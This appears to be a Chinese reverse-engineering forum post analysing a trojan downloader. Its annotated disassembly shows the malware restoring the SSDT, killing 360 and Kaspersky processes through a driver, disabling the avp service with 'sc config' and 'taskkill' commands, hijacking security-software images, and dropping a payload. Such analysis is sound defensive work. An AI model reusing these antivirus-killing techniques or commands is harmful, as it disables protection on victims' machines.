.Upack:0041EA91 push eax
.Upack:0041EA92 call __DeleteFileA ; 删除文件"c:\progra~1\\RAV\CCtest.inf"
.Upack:0041EA97 lea eax, [ebp+SysName]
.Upack:0041EA9D push eax
.Upack:0041EA9E call __DeleteFileA ; 删除文件"c:\progra~1\\RAV\CCtest.sys"
.Upack:0041EAA3 lea eax, [ebp+lpSubKey]
.Upack:0041EAA9 push eax
.Upack:0041EAAA push 80000002h
.Upack:0041EAAF call __RegDeleteKeyA
.Upack:0041EAB4 push ebx
.Upack:0041EAB5 lea eax, [ebp+szCMDStop]
.Upack:0041EAB8 push ebx
.Upack:0041EAB9 push eax
.Upack:0041EABA push offset aSc ; "sc"
.Upack:0041EABF push offset aOpen ; "open"
.Upack:0041EAC4 push ebx
.Upack:0041EAC5 call __ShellExecuteA ; 停止"IP 安全策略"服务
.Upack:0041EACA push 5DCh
.Upack:0041EACF call __Sleep
.Upack:0041EAD4 add esp, 2Ch
.Upack:0041EAD7
.Upack:0041EAD7 FailRet: ; CODE XREF: KillSafeSoft+6C2j
.Upack:0041EAD7 ; KillSafeSoft+6D7j
.Upack:0041EAD7 xor eax, eax
.Upack:0041EAD9
.Upack:0041EAD9 Ret: ; CODE XREF: KillSafeSoft+729j
.Upack:0041EAD9 pop edi
.Upack:0041EADA pop esi
.Upack:0041EADB pop ebx
.Upack:0041EADC leave
.Upack:0041EADD retn
.Upack:0041EADD KillSafeSoft endp
复制代码之后就是清理现场了,删除释放的文件.Upack:0041EA1A loc_41EA1A: ; CODE XREF: KillSafeSoft+70Aj
.Upack:0041EA1A lea eax, [ebp+DllName]
.Upack:0041EA20 push eax ; lpFileName
.Upack:0041EA21 call ReleaseDllFile ; 释放文件"c:\progra~1\\RAV\CCtest.dll"
.Upack:0041EA26 test al, al
.Upack:0041EA28 pop ecx
.Upack:0041EA29 jz short loc_41EA67 ; 释放文件失败跳走
.Upack:0041EA2B lea eax, [ebp+DllName]
.Upack:0041EA31 push eax ; lpLibFileName
.Upack:0041EA32 call LoadLibraryA ; 加载释放的文件"c:\progra~1\\RAV\CCtest.dll
.Upack:0041EA38 mov edi, eax
.Upack:0041EA3A lea eax, [ebp+testall]
.Upack:0041EA3D push eax ; lpProcName
.Upack:0041EA3E push edi ; hModule
.Upack:0041EA3F call GetProcAddress ; 获"c:\progra~1\\RAV\CCtest.dll"
.Upack:0041EA3F ; 的testall函数地址
.Upack:0041EA45 push esi ; hDevice
.Upack:0041EA46 call eax ; 调用testall,ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程
.Upack:0041EA48 push 0BB8h
.Upack:0041EA4D call __Sleep
.Upack:0041EA52 pop ecx
.Upack:0041EA53 push edi ; hLibModule
.Upack:0041EA54 call FreeLibrary
.Upack:0041EA5A lea eax, [ebp+DllName]
.Upack:0041EA60 push eax
.Upack:0041EA61 call __DeleteFileA
复制代码回到主函数
做掉安全软件之后,就释放一个随机文件名的文件,开始下载大量木马.Upack:0041ED92 lea eax, [ebp+szRandTempFileName]
.Upack:0041ED98 push eax ; lpBuffer
.Upack:0041ED99 push esi ; nBufferLength
.Upack:0041ED9A call GetTempPathA
.Upack:0041EDA0 ; .Upack:0041EDA0
.Upack:0041EDA9 nop
.Upack:0041EDAA
.Upack:0041EDAA loc_41EDAA: ; CODE XREF: start+2C9j
.Upack:0041EDAA call __GetTickCount ; 获取系统滴答数,以产生随机数
.Upack:0041EDAF 构建随机临时文件
.Upack:0041EDAF push eax
.Upack:0041EDB0 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDB6 push eax
.Upack:0041EDB7 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDBD push offset aScdD_exe ; "%scd%d.exe"
.Upack:0041EDC2 push eax ; LPSTR
.Upack:0041EDC3 call wsprintfA
.Upack:0041EDC9 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDCF push eax ; lpszRandTempFileName
.Upack:0041EDD0 call ReleaseRandomTempFile ; 临时目录释放随机生成文件名的文件
.Upack:0041EDD5 nop
.Upack:0041EDD6 push ebx
.Upack:0041EDD7 push ebx
.Upack:0041EDD8 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDDE push offset lpParameters
.Upack:0041EDE3 push eax
.Upack:0041EDE4 push 41CB18h
.Upack:0041EDE9 push ebx
.Upack:0041EDEA call __ShellExecuteA ; 运行随机生成文件名的文件,开始下载木马了
复制代码释文文件tmpacik.tmp并加载,调用killhy来做掉还原.Upack:0041EE78 loc_41EE78: ; CODE XREF: start+397j
.Upack:0041EE78 lea eax, [ebp+tmpFileName] ; "C:\windows\system32\tmpacik.tmp"
.Upack:0041EE7E push eax ; lpFileName
.Upack:0041EE7F call ReleaseFile ; 系统目录下释放文件"tmpacik.tmp"
.Upack:0041EE84 test al, al
.Upack:0041EE86 pop ecx
.Upack:0041EE87 jz short loc_41EEE4 ; 释放文件失败跳走
.Upack:0041EE89 lea eax, [ebp+tmpFileName] ; "C:\windows\system32\tmpacik.tmp"
.Upack:0041EE8F push eax ; lpLibFileName
.Upack:0041EE90 call LoadLibraryA ; 加载释放的文件"C:\windows\system32\tmpacik.tmp"
.Upack:0041EE96 ; .Upack:0041EE96
.Upack:0041EE9F lea ecx, [ebp+killhy]
.Upack:0041EEA2 push ecx ; lpProcName
.Upack:0041EEA3
.Upack:0041EEA3 loc_41EEA3: ; CODE XREF: start+3BEj
.Upack:0041EEA3 push eax ; hModule
.Upack:0041EEA4 call GetProcAddress ; 获取killhy函数地址
.Upack:0041EEAA ; .Upack:0041EEAA
.Upack:0041EEB3
.Upack:0041EEB3 loc_41EEB3: ; CODE XREF: start+3D2
复制代码母体文件分析完毕
***********************************释放的文件CCtest.dll分析************************************
模块初始化时提升进程权限
.text:100027E0 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
.text:100027E0 public DllEntryPoint
.text:100027E0 DllEntryPoint proc near
.text:100027E0
.text:100027E0 hinstDLL = dword ptr 4
.text:100027E0 fdwReason = dword ptr 8
.text:100027E0 lpReserved = dword ptr 0Ch
.text:100027E0
.text:100027E0 call __AdjustTokenPrivilege
.text:100027E5 push 774393E8h
.text:100027EA push 1
.text:100027EC call GetProcAddressByHashValue ; 获取GetModuleFileName函数地址
.text:100027F1 push 0FFh
.text:100027F6 push offset lpszDllModuleFileName
.text:100027FB mov ecx, [esp+8+hinstDLL]
.text:100027FF push ecx
.text:10002800 call eax ; GetModuleFileName
.text:10002802 mov eax, 1
.text:10002807 retn 0Ch
.text:10002807 DllEntryPoint endp
复制代码CCtest.dll的testall接口分析
.text:10002670 sub_10002670 proc near ; CODE XREF: testall+Ep
.text:10002670
.text:10002670 szShellExecute = byte ptr -1Ch
.text:10002670 szShell32_dll = byte ptr -0Ch
.text:10002670 hDriver = dword ptr 8
.text:10002670
.text:10002670 push ebp
.text:10002671 mov ebp, esp
.text:10002673 sub esp, 1Ch
.text:10002676 mov al, 'l'
.text:10002678 push esi
.text:10002679 mov [ebp+szShellExecute+3], al
.text:1000267C mov [ebp+szShellExecute+4], al
.text:1000267F mov [ebp+szShell32_dll+3], al
.text:10002682 mov [ebp+szShell32_dll+4], al
.text:10002685 mov [ebp+szShell32_dll+9], al
.text:10002688 mov [ebp+szShell32_dll+0Ah], al
.text:1000268B lea eax, [ebp+szShell32_dll]
.text:1000268E mov cl, 'e'
.text:10002690 xor dl, dl
.text:10002692 push eax ; lpLibFileName
.text:10002693 mov [ebp+szShellExecute], 'S'
.text:10002697 mov [ebp+szShellExecute+1], 'h'
.text:1000269B mov [ebp+szShellExecute+2], cl
.text:1000269E mov [ebp+szShellExecute+5], 'E'
.text:100026A2 mov [ebp+szShellExecute+6], 'x'
.text:100026A6 mov [ebp+szShellExecute+7], cl
.text:100026A9 mov [ebp+szShellExecute+8], 'c'
.text:100026AD mov [ebp+szShellExecute+9], 'u'
.text:100026B1 mov [ebp+szShellExecute+0Ah], 't'
.text:100026B5 mov [ebp+szShellExecute+0Bh], cl
.text:100026B8 mov [ebp+szShellExecute+0Ch], 'A'
.text:100026BC mov [ebp+szShellExecute+0Dh], dl
.text:100026BF mov [ebp+szShell32_dll], 's'
.text:100026C3 mov [ebp+szShell32_dll+1], 'h'
.text:100026C7 mov [ebp+szShell32_dll+2], cl
.text:100026CA mov [ebp+szShell32_dll+5], '3'
.text:100026CE mov [ebp+szShell32_dll+6], '2'
.text:100026D2 mov [ebp+szShell32_dll+7], '.'
.text:100026D6 mov [ebp+szShell32_dll+8], 'd'
.text:100026DA mov [ebp+szShell32_dll+0Bh], dl
.text:100026DD call LoadLibraryA
.text:100026E3 nop
.text:100026E4 lea ecx, [ebp+szShellExecute]
.text:100026E7 push ecx ; lpProcName
.text:100026E8 push eax ; hModule
.text:100026E9 call GetProcAddress
.text:100026EF mov lpfnShellExecute, eax
.text:100026F4 ; .text:100026F4
.text:100026FC mov esi, [ebp+hDriver]
.text:100026FF push esi
.text:10002700
.text:10002700 loc_10002700: ; CODE XREF: sub_10002670+89j
.text:10002700 call ReSSDT ; ring0恢复SSDT
.text:10002705 add esp, 4
.text:10002708 push eax
.text:10002709 nop
.text:1000270A nop
.text:1000270B pop eax
.text:1000270C push 3D9972F5h
.text:10002711 push 1
.text:10002713 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:10002718 push 1000
.text:1000271D call eax ; Sleep
.text:1000271F push eax
.text:10002720 nop
.text:10002721 nop
.text:10002722 pop eax
.text:10002723 push offset String2 ; "hnuq1h{h"
.text:10002728 call DecryString ; 解密后字符串是"ekrn.exe"
.text:1000272D push eax ; lpString1
.text:1000272E call GetProcessId ; 遍历进程获取ID
.text:10002733 add esp, 8
.text:10002736 test eax, eax
.text:10002738 jnz short loc_10002756 ; 找到"ekrn.exe"进程跳走
.text:1000273A push esi ; hDriver
.text:1000273B call Kill360Safe ; 结束360安全卫士及主动防御进程
.text:10002740 add esp, 4
.text:10002743 push 3D9972F5h
.text:10002748 push 1
.text:1000274A call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:1000274F push 1000
.text:10002754 call eax ; Sleep
.text:10002756 ; loc_10002756
.text:10002762
.text:10002762 loc_10002762: ; CODE XREF: sub_10002670+EBj
.text:10002762 call KillAvp ; 做掉卡巴,先卸载卡巴的模块,
.text:10002762 ; 一个结束进程的批处理做掉卡巴
.text:10002767 ; .text:10002767
.text:1000276B push 3D9972F5h
.text:10002770 push 1
.text:10002772 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:10002777 push 1000
.text:1000277C call eax ; Sleep
.text:1000277E ; .text:1000277E
.text:10002782 push esi ; hDriver
.text:10002783 call KillSafeSoft ; 遍历进程结束掉大量的安全软件进程
.text:10002788 ; .text:10002788
.text:10002790 push esi ; hDriver
.text:10002791
.text:10002791 loc_10002791: ; CODE XREF: sub_10002670+11Dj
.text:10002791 call ImageExecuteFile ; ring0镜像劫持安全软件的进程
.text:10002796 add esp, 4
.text:10002799 push 3D9972F5h
.text:1000279E push 1
.text:100027A0 call GetProcAddressByHashValue
.text:100027A5 push 3E8h
.text:100027AA call eax
.text:100027AC pop esi
.text:100027AD mov esp, ebp
.text:100027AF pop ebp
.text:100027B0 retn
.text:100027B0 sub_10002670 endp ; sp-analysis failed
.text:100027B0
.text:100027B0 ; ---------------------------------------------------------------------------
.text:100027B1 align 10h
.text:100027C0 ; Exported entry 1. testall
复制代码
进入call ReSSDT看看,其call主要功能是恢复SSDT
调用NtQuerySystemInformation的B号功能获取当前获取内核的模块基址与内核模块名.text:1000186F 获取系统模块
.text:1000186F mov esi, eax
.text:10001871 nop
.text:10001872 mov ecx, [ebp+pModules]
.text:10001875 lea eax, [ebp+dwNeededSize]
.text:10001878 push eax ; ReturnLength
.text:10001879 push 4 ; SystemInformationLength
.text:1000187B push ecx ; SystemInformation
.text:1000187C push 0Bh ; SystemModuleInformation
.text:1000187E call esi ; NtQuerySystemInformation
.text:10001880 nop
.text:10001881 cmp eax, 0C0000004h
.text:10001886 jnz Ret ; 失败跳走
.text:1000188C mov edx, [ebp+dwNeededSize]
.text:1000188F push edx ; dwBytes
.text:10001890 push 40h ; uFlags
.text:10001892 call GlobalAlloc
.text:10001898 mov ecx, [ebp+dwNeededSize]
.text:1000189B push edi
.text:1000189C push ecx
.text:1000189D push eax
.text:1000189E push 0Bh
.text:100018A0 mov [ebp+pModules], eax
.text:100018A3 call esi ; NtQuerySystemInformation
.text:100018A5 test eax, eax
.text:100018A7 jl Ret ; 失败跳走
.text:100018AD mov eax, [ebp+pModules]
.text:100018B0 xor ecx, ecx
.text:100018B2 mov cx, [eax+MODULES.smi.ModuleNameOffset]
.text:100018B6 mov edx, [eax+MODULES.smi.Base]
.text:100018B9 mov [ebp+hKernelBase], edx
.text:100018BC lea eax, [ecx+eax+MODULES.smi.ImageName] ; 得到内核模块名
复制代码
在用户进程中加载一个内核副本,搜索内核的副本并得到KeServiceDescriptorTable RAV地址
.text:100018C1 push 1 ; dwFlags
.text:100018C3 push edi ; hFile
.text:100018C4 push eax ; lpLibFileName
.text:100018C5 call LoadLibraryExA ; 加载内核副本
.text:100018CB mov esi, eax
.text:100018CD test esi, esi
.text:100018CF mov [ebp+hKernel], esi
.text:100018D2 jz Ret
.text:100018D8 nop
.text:100018D9 mov edx, [ebp+pModules]
.text:100018DC push edx ; hMem
.text:100018DD call GlobalFree
.text:100018E3 push offset ProcName ; "KeServiceDescriptorTable"
.text:100018E8 push esi ; hModule
.text:100018E9 call ebx ; GetProcAddress
.text:100018EB test eax, eax
.text:100018ED jz short Ret ; 失败跳走
.text:100018EF sub eax, esi ; 得到KeServiceDescriptorTable RAV地址
.text:100018F1 push eax
.text:100018F2 push esi
.text:100018F3 call FindKiServiceTable
复制代码
通过内核副本的原始数据发送控制码恢复SSDT.text:1000192B mov ebx, [eax]
.text:1000192D mov edx, [ebp+hKernelBase]
.text:10001930 sub ecx, ebx
.text:10001932 lea eax, [ebp+ulAddr]
.text:10001935 add ecx, edx
.text:10001937 push eax ; pulAddr
.text:10001938 mov [ebp+ulAddr], ecx
.text:1000193B mov ecx, [ebp+hDriver]
.text:1000193E push edi ; dwServices
.text:1000193F push ecx ; hDriver
.text:10001940 call SetProc ; 除了Hash值获取函数地址其他的
.text:10001940 ; 都是COPY来的一字未改的代码
.text:10001945 mov edx, [ebp+poh]
.text:10001948 mov ecx, [esi+4]
.text:1000194B add esi, 4
.text:1000194E mov ebx, ecx
.text:10001950 sub ebx, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
.text:10001953 lea eax, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
.text:10001956 add esp, 0Ch
.text:10001959 inc edi
.text:1000195A cmp ebx, [edx+IMAGE_OPTIONAL_HEADER32.SizeOfImage]
.text:1000195D jb short loc_1000192B
.text:1000195F
复制代码进入call Kill360Safe看看
下面的废话不多说,建立进程快照遍历进程获取360tray.exe与Zhudongfangyu.exe的进程ID,并把进程ID通过调用DeviceIoControl来结束安全软件进程.text:100024C8 mov [ebp+sz360tray_exe], '3' ; 生成字符串"360tray.exe"
.text:100024CC mov [ebp+sz360tray_exe+1], '6'
.text:100024D0 mov [ebp+sz360tray_exe+2], '0'
.text:100024D4 mov [ebp+sz360tray_exe+3], 't'
.text:100024D8 mov [ebp+sz360tray_exe+4], 'r'
.text:100024DC mov [ebp+sz360tray_exe+5], 'a'
.text:100024E0 mov [ebp+sz360tray_exe+6], 'y'
.text:100024E4 mov [ebp+sz360tray_exe+7], '.'
.text:100024E8 mov [ebp+sz360tray_exe+8], al
.text:100024EB mov [ebp+sz360tray_exe+9], 'x'
.text:100024EF mov [ebp+sz360tray_exe+0Ah], al
.text:100024F2 mov [ebp+sz360tray_exe+0Bh], 0
.text:100024F6 mov [ebp+szZhudongfangyu_exe], 'z' ; 生成字符串"Zhudongfangyu.exe"
.text:100024FA mov [ebp+szZhudongfangyu_exe+1], 'h'
.text:100024FE mov [ebp+szZhudongfangyu_exe+2], bl
.text:10002501 mov [ebp+szZhudongfangyu_exe+3], 'd'
.text:10002505 mov [ebp+szZhudongfangyu_exe+4], 'o'
.text:10002509 mov [ebp+szZhudongfangyu_exe+5], dl
.text:1000250C mov [ebp+szZhudongfangyu_exe+6], cl
.text:1000250F mov [ebp+szZhudongfangyu_exe+7], 'f'
.text:10002513 mov [ebp+szZhudongfangyu_exe+8], 'a'
.text:10002517 mov [ebp+szZhudongfangyu_exe+9], dl
.text:1000251A mov [ebp+szZhudongfangyu_exe+0Ah], cl
.text:1000251D mov [ebp+szZhudongfangyu_exe+0Bh], 'y'
.text:10002521 mov [ebp+szZhudongfangyu_exe+0Ch], bl
.text:10002524 mov [ebp+szZhudongfangyu_exe+0Dh], '.'
.text:10002528 mov [ebp+szZhudongfangyu_exe+0Eh], al
.text:1000252B mov [ebp+szZhudongfangyu_exe+0Fh], 'x'
.text:1000252F mov [ebp+szZhudongfangyu_exe+10h], al
.text:10002532 mov [ebp+szZhudongfangyu_exe+11h], 0
.text:10002536 call CreateToolhelp32Snapshot
.text:1000253B mov esi, eax
.text:1000253D mov [ebp+pe.dwSize], 128h
.text:10002547 push eax
.text:10002548 nop
.text:10002549 pop eax
.text:1000254A lea eax, [ebp+pe]
.text:10002550 push eax ; lppe
.text:10002551 push esi ; hSnapshot
.text:10002552 call Process32First
.text:10002557 test eax, eax
.text:10002559 jz short loc_100025C4
.text:1000255B mov edi, [ebp+arg_0]
.text:1000255E mov ebx, lstrcmpiA
.text:10002564
.text:10002564 loc_10002564: ; CODE XREF: Kill360Safe+112j
.text:10002564 lea ecx, [ebp+sz360tray_exe]
.text:10002567 lea edx, [ebp+pe.szExeFile]
.text:1000256D push ecx ; lpString2
.text:1000256E push edx ; lpString1
.text:1000256F call ebx ; lstrcmpiA ; 比较是否"360tray.exe"进程
.text:10002571 test eax, eax
.text:10002573 jz short loc_10002586
.text:10002575 lea eax, [ebp+szZhudongfangyu_exe]
.text:10002578 lea ecx, [ebp+pe.szExeFile]
.text:1000257E push eax ; lpString2
.text:1000257F push ecx ; lpString1
.text:10002580 call ebx ; lstrcmpiA ; 比较是否"Zhudongfangyu.exe"进程
.text:10002582 test eax, eax
.text:10002584 jnz short GotoNext
.text:10002586
.text:10002586 loc_10002586: ; CODE XREF: Kill360Safe+C3j
.text:10002586 mov edx, [ebp+pe.th32ProcessID]
.text:1000258C push 82E8173h
.text:10002591 push 1
.text:10002593 mov [ebp+dwProcessID], edx
.text:10002596 call GetProcAddressByHashValue
.text:1000259B 发送控制码结束进程
.text:1000259B lea ecx, [ebp+BytesReturned]
.text:1000259E push 0
.text:100025A0 push ecx
.text:100025A1 push 0
.text:100025A3 push 0
.text:100025A5 lea edx, [ebp+dwProcessID]
.text:100025A8 push 4
.text:100025AA push edx
.text:100025AB push 222004h
.text:100025B0 push edi
.text:100025B1 call eax ; DeviceIoControl
.text:100025B3
.text:100025B3 GotoNext: ; CODE XREF: Kill360Safe+D4j
.text:100025B3 lea eax, [ebp+pe]
.text:100025B9 push eax ; lppe
.text:100025BA push esi ; hSnapshot
.text:100025BB call Process32Next
.text:100025C0 test eax, eax
.text:100025C2 jnz short loc_10002564
.text:100025C4
.text:100025C4 loc_100025C4: ; CODE XREF: Kill360Safe+A9j
.text:100025C4 push 723EB0D5h
.text:100025C9 push 1
.text:100025CB call GetProcAddressByHashValue ; 获取CloseHandle函数地址
.text:100025D0 push esi
.text:100025D1 call eax ; CloseHandle
.text:100025D3 push eax
.text:100025D4 nop
.text:100025D5 pop eax
.text:100025D6 pop edi
.text:100025D7 pop esi
.text:100025D8 xor eax, eax
.text:100025DA pop ebx
.text:100025DB mov esp, ebp
.text:100025DD pop ebp
.text:100025DE retn
.text:100025DE Kill360Safe endp
复制代码再进入call KillAvp 看看
1.建立进程快照遍历进程获取进程AVP.EXE的进程ID,并禁用卡巴服务
2.建立卡巴的模块快照再次遍历AVP的模块,并卸载卡马的以下模块
kavbase.kdl
klavemu.kdl
webav.kdl
kjim.kdl
vlns.kdl
mark.kdl
3.最后"taskkill.exe /f /t /im avp.exe"一个结束进程的批处理做掉卡巴
.text:10002280 call CreateToolhelp32Snapshot
.text:10002285 mov edi, eax
.text:10002287 lea eax, [ebp+pe]
.text:1000228D push eax ; lppe
.text:1000228E push edi ; hSnapshot
.text:1000228F mov [ebp+pe.dwSize], 128h
.text:10002299 call Process32First
.text:1000229E test eax, eax
.text:100022A0 jz loc_100023E9
.text:100022A6 mov ebx, lstrcmpiA
.text:100022AC mov esi, lstrcpyA
.text:100022B2
.text:100022B2 loc_100022B2: ; CODE XREF: KillAvp+2C3j
.text:100022B2 push offset aDys1hH ; "dys1h{h"
.text:100022B7 call DecryString ; 解码后"avp.exe"
.text:100022BC add esp, 4
.text:100022BF lea ecx, [ebp+pe.szExeFile]
.text:100022C5 push eax ; lpString2
.text:100022C6 push ecx ; lpString1
.text:100022C7 call ebx ; lstrcmpiA ; 比较是否"avp.exe"进程
.text:100022C9 test eax, eax
.text:100022CB jnz loc_100023D4 ; 未找到"avp.exe"进程跳走
.text:100022D1 nop
.text:100022D2 push eax
.text:100022D3 push eax
.text:100022D4 lea edx, [ebp+szCMDDisabledAvpService]
.text:100022D7 lea eax, [ebp+SC]
.text:100022DA push edx ; "config avp start= disabled"
.text:100022DB push eax ; "sc"
.text:100022DC push 0
.text:100022DE push 0
.text:100022E0 call lpfnShellExecute ; 禁用卡巴服务
.text:100022E6 push 3D9972F5h
.text:100022EB push 1
.text:100022ED call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:100022F2 push 2500
.text:100022F7 call eax ; Sleep
.text:100022F9 nop
.text:100022FA mov edx, [ebp+pe.th32ProcessID]
.text:10002300 lea ecx, [ebp+szKavbase_kdl]
.text:10002303 push ecx ; lpszModuleName
.text:10002304 push edx ; dwProcessId
.text:10002305 call UnloadModule ; 卸载模块
.text:1000230A nop
.text:1000230B mov ecx, [ebp+pe.th32ProcessID]
.text:10002311 lea eax, [ebp+szWebav_kdl]
.text:10002314 push eax ; lpszModuleName
.text:10002315 push ecx ; dwProcessId
.text:10002316 call UnloadModule
.text:1000231B nop
.text:1000231C mov eax, [ebp+pe.th32ProcessID]
.text:10002322 lea edx, [ebp+szVlns_kdl]
.text:10002325 push edx ; lpszModuleName
.text:10002326 push eax ; dwProcessId
.text:10002327 call UnloadModule
.text:1000232C nop
.text:1000232D mov edx, [ebp+pe.th32ProcessID]
.text:10002333 lea ecx, [ebp+szMark_kdl]
.text:10002336 push ecx ; lpszModuleName
.text:10002337 push edx ; dwProcessId
.text:10002338 call UnloadModule
.text:1000233D nop
.text:1000233E mov ecx, [ebp+pe.th32ProcessID]
.text:10002344 lea eax, [ebp+szKlavemu_kdl]
.text:10002347 push eax ; lpszModuleName
.text:10002348 push ecx ; dwProcessId
.text:10002349 call UnloadModule
.text:1000234E nop
.text:1000234F mov eax, [ebp+pe.th32ProcessID]
.text:10002355 lea edx, [ebp+szKjim_kdl]
.text:10002358 push edx ; lpszModuleName
.text:10002359 push eax ; dwProcessId
.text:1000235A call UnloadModule
.text:1000235F add esp, 30h
.text:10002362 push 3D9972F5h
.text:10002367 push 1
.text:10002369 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:1000236E push 1000
.text:10002373 call eax ; Sleep
.text:10002375 nop
.text:10002376 push offset aWdvnnloo1hH ; "wdvnnloo1h{h"
.text:1000237B call DecryString ; 解密后字符"taskkill.exe"
.text:10002380 add esp, 4
.text:10002383 lea ecx, [ebp+szProcTaskkill_exe]
.text:10002389 push eax ; lpString2
.text:1000238A push ecx ; lpString1
.text:1000238B call esi ; lstrcpyA
.text:1000238D push offset a2i2w2lpDys1hH ; "2i#2w#2lp#dys1h{h"
.text:10002392 call DecryString ; 解密后字符串"/f /t /im avp.exe"
.text:10002397 add esp, 4
.text:1000239A lea edx, [ebp+lpCMDKillAvp]
.text:100023A0 push eax ; lpString2
.text:100023A1 push edx ; lpString1
.text:100023A2 call esi ; lstrcpyA
.text:100023A4 push 0
.text:100023A6 lea eax, [ebp+lpCMDKillAvp]
.text:100023AC push 0
.text:100023AE lea ecx, [ebp+szProcTaskkill_exe]
.text:100023B4 push eax ; "/f /t /im avp.exe"
.text:100023B5 push ecx ; "taskkill.exe"
.text:100023B6 push 0
.text:100023B8 push 0
.text:100023BA call lpfnShellExecute ; 一个处理做掉卡巴
.text:100023C0 push 3D9972F5h
.text:100023C5 push 1
.text:100023C7 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:100023CC push 4500
.text:100023D1 call eax ; Sleep
.text:100023D3 nop
.text:100023D4
.text:100023D4 loc_100023D4: ; CODE XREF: KillAvp+1ABj
.text:100023D4 lea edx, [ebp+pe]
.text:100023DA push edx ; lppe
.text:100023DB push edi ; hSnapshot
.text:100023DC call Process32Next
.text:100023E1 test eax, eax
.text:100023E3 jnz loc_100022B2
.text:100023E9
.text:100023E9 loc_100023E9: ; CODE XREF: KillAvp+180j
.text:100023E9 push 723EB0D5h
.text:100023EE push 1
.text:100023F0 call GetProcAddressByHashValue ; 获取CloseHandle函数地址
.text:100023F5 push edi
.text:100023F6 call eax ; CloseHandle
.text:100023F8 push eax
.text:100023F9 nop
.text:100023FA pop eax
.text:100023FB pop edi
.text:100023FC pop esi
.text:100023FD xor eax, eax
.text:100023FF pop ebx
.text:10002400 mov esp, ebp
.text:10002402 pop ebp
.text:10002403 retn
.text:10002403 KillAvp endp
复制代码
进入 call ImageExecuteFile
依次访问并解码安全软件的进程字符串数粗
发送控制码劫持安全软件进程
.text:10001A3F
.text:10001A3F loc_10001A3F: ; CODE XREF: ImageExecuteFile+124j
.text:10001A3F mov ecx, 3Fh
.text:10001A44 xor eax, eax
.text:10001A46 lea edi, [ebp+MultiByteStr]
.text:10001A4C rep stosd
.text:10001A4E stosw
.text:10001A50 stosb
.text:10001A51 nop
.text:10001A52 mov eax, [ebp+lpSafeProcList]
.text:10001A55 mov esi, lstrcpyA
.text:10001A5B lea edx, [ebp+MultiByteStr]
.text:10001A61 mov ecx, [eax] ; 取出一个安全进程命名
.text:10001A63 push ecx ; lpString2
.text:10001A64 push edx ; lpString1
.text:10001A65 call esi ; lstrcpyA
.text:10001A67 nop
.text:10001A68 lea eax, [ebp+MultiByteStr]
.text:10001A6E push eax ; lpString
.text:10001A6F call DecryProcName ; 解密进程名
.text:10001A74 add esp, 4
.text:10001A77 lea ecx, [ebp+MultiByteStr]
.text:10001A7D push eax ; lpString2
.text:10001A7E push ecx ; lpString1
.text:10001A7F call esi ; lstrcpyA ; 复制解密后的字符串
.text:10001A81 nop
.text:10001A82 lea edx, [ebp+szExe]
.text:10001A85 lea eax, [ebp+MultiByteStr]
.text:10001A8B push edx ; lpString2
.text:10001A8C push eax ; lpString1
.text:10001A8D call lstrcatA ; 构建完整的进程名
.text:10001A93 nop
.text:10001A94 push 0 ; cchWideChar
.text:10001A96 push 0 ; lpWideCharStr
.text:10001A98 lea ecx, [ebp+MultiByteStr]
.text:10001A9E push -1 ; cbMultiByte
.text:10001AA0 push ecx ; lpMultiByteStr
.text:10001AA1 push 1 ; dwFlags
.text:10001AA3 push 0 ; CodePage
.text:10001AA5 call MultiByteToWideChar ; 计算出进程名长度
.text:10001AAB lea ebx, [eax+eax] ; 进程名长度*2
.text:10001AAE mov [ebp+WideCharSize], eax
.text:10001AB1 push ebx ; dwBytes
.text:10001AB2 push 40h ; uFlags
.text:10001AB4 call GlobalAlloc ; 分配宽字符进程名的空间
.text:10001ABA mov esi, eax
.text:10001ABC test esi, esi
.text:10001ABE jz short loc_10001B0F ; 分配失败跳走
.text:10001AC0 mov ecx, ebx
.text:10001AC2 xor eax, eax
.text:10001AC4 mov edx, ecx
.text:10001AC6 mov edi, esi
.text:10001AC8 shr ecx, 2
.text:10001ACB rep stosd ; 分配的空间内存清0
.text:10001ACD mov ecx, edx
.text:10001ACF and ecx, 3
.text:10001AD2 rep stosb
.text:10001AD4 mov eax, [ebp+WideCharSize]
.text:10001AD7 lea ecx, [ebp+MultiByteStr]
.text:10001ADD push eax ; cchWideChar
.text:10001ADE push esi ; lpWideCharStr
.text:10001ADF push -1 ; cbMultiByte
.text:10001AE1 push ecx ; lpMultiByteStr
.text:10001AE2 push 1 ; dwFlags
.text:10001AE4 push 0 ; CodePage
.text:10001AE6 call MultiByteToWideChar ; 进程名转换成Unicode字符
.text:10001AEC push 82E8173h
.text:10001AF1 push 1
.text:10001AF3 call GetProcAddressByHashValue ; 获取DeviceIoControl进程地址
.text:10001AF8 发送控制码镜像劫持安全软件进程名
.text:10001AF8 mov ecx, [ebp+hDriver]
.text:10001AFB lea edx, [ebp+BytesReturned]
.text:10001AFE push 0
.text:10001B00 push edx
.text:10001B01 push 0
.text:10001B03 push 0
.text:10001B05 push ebx
.text:10001B06 push esi
.text:10001B07 push 22E140h
.text:10001B0C push ecx
.text:10001B0D call eax ; DeviceIoControl
.text:10001B0F
.text:10001B0F loc_10001B0F: ; CODE XREF: ImageExecuteFile+BEj
.text:10001B0F push esi ; hMem
.text:10001B10 call GlobalFree
.text:10001B16 mov eax, [ebp+lpSafeProcList]
.text:10001B19 add eax, 4
.text:10001B1C cmp eax, offset dword_1000124C
.text:10001B21 mov [ebp+lpSafeProcList], eax
.text:10001B24 jl loc_10001A3F ; 未到进程列表未尾继续循环
复制代码
输入法注入的木马下载器完全逆向与分析
http://bbs.pediy.com/showthread.php?p=832346#post832346
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
赞赏
|
|
|---|---|
|
|
感谢分享经验...
不过我没看懂... |
|
|
还是膜拜, 帮顶
|
|
|
每一个原创帖子都要顶一下
|
|
|
赞赏
雪币:
留言:
